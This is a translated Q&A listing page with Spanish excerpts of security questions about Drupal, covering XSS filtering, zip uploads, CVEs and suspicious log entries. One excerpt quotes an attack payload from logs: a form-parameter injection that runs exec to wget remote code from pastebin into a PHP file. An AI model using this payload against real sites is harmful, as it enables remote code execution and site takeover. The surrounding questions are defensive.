Preguntas con etiqueta 'drupal'

4
respuestas

¿Cuáles son las amenazas de seguridad de las cargas de archivos zip y qué medidas preventivas deben tomarse?

Tenemos una aplicación Drupal desarrollada para compartir archivos. Estamos permitiendo que los archivos zip sean cargados por usuarios registrados en el departamento. Estamos utilizando el sistema de archivos privado Drupal (fuera de webr...
hecha 04.04.2013 - 09:38
2
respuestas

Drupal filtra XSS con expresiones regulares. ¿Qué podría evitarlo?

Drupal filtra las cadenas HTML contra ataques XSS usando expresiones regulares: enlace Sin embargo, como mucha gente sabe, HTML no se puede analizar con expresiones regulares . Lo que me hace pensar que la función filter_xss podr...
hecha 02.11.2012 - 16:43
1
respuesta

¿Por qué recibo solicitudes de URL para páginas que nunca tuve en mi sitio?

En mi sitio de Drupal recibo solicitudes extrañas de rutas de URL que nunca he tenido y no tengo nada que ver con mi sitio. ¿Alguien podría explicar por qué las personas (o los robots) están buscando las siguientes URL? recurso-centro / noti...
hecha 13.10.2015 - 18:59
2
respuestas

Drupal disputado CVE Cinco años Tempestad - ¿Falta de seguridad de código abierto?

¿Alguien puede agregar contexto al tema? A primera vista, me parece que este problema representa un déficit fundamental en las fuerzas que fomentan la codificación segura en el desarrollo de código abierto. ¿Es ese el caso y / o es este ejemplo...
hecha 29.03.2012 - 17:00
1
respuesta

Drupal 7 - ataque en los registros

En mis registros de Drupal 7 veo entradas como: http://example.com/?q=file/ajax/name/%23value/form-tkSDwR6W66a8vR_AIDxAzwMVklkjTkNMjf8SEqfTX8Q Hay varias entradas como esta, con solo la última cadena cambiada. Es por un usuario no autent...
hecha 18.04.2018 - 21:49
3
respuestas

Drupal SQLi solo en el formulario de inicio de sesión?

Recientemente, CVE-2014-3704 estuvo en las noticias. Esta vulnerabilidad permite a los atacantes ejecutar SQLi sin necesidad de iniciar sesión. Sin embargo, he buscado las vulnerabilidades disponibles y solo he encontrado explotaciones que hacen...
hecha 03.11.2014 - 13:49
2
respuestas

¿Debo preocuparme por los intentos de ataque de usuario de Drupal 7?

En mis registros veo intentos regulares, algunas veces al día, como estos: http://www.example.com/user/password?name[%23post_render][0]=exec&name[%23markup]=wget+https%3a%2f%2fpastebin.com%2fraw%2fPeBdUg98+--no-check-certificate+-O+wer.PHP...
hecha 21.04.2018 - 21:33
3
respuestas

Cómo explotar DRUPAL-SA-CORE-2012-003

He leído los avisos de seguridad y entiendo que "permitiría a un atacante reinstalar un sitio de Drupal existente con una base de datos externa. servidor y luego ejecutar código PHP personalizado ". Según Drupal, "la reinstalación solo puede t...
hecha 18.10.2012 - 17:19
1
respuesta

ALERTA: los caracteres ASCII-NUL no están permitidos dentro de las variables de solicitud

En un sitio de Drupal, recibo este error en el syslog de mi Debian:    suhosin [9413]: ALERT - No se permiten los caracteres ASCII-NUL dentro de la solicitud   variables: variable caída 'nombre' (atacante 'x.x.x.x', archivo   '/path/to/index....
hecha 25.03.2013 - 09:06
1
respuesta

¿Es OSSEC eficaz para proteger una instalación de Drupal?

Me di cuenta de que las reglas 2.8.1 tienen wordpress y otros productos listados, pero no hay reglas de Drupal. ¿Es seguro asumir que OSSEC, actuando como un IPS en modo activo, simplemente no va a bloquear ningún ataque específico de Drupal? En...
hecha 21.04.2015 - 17:40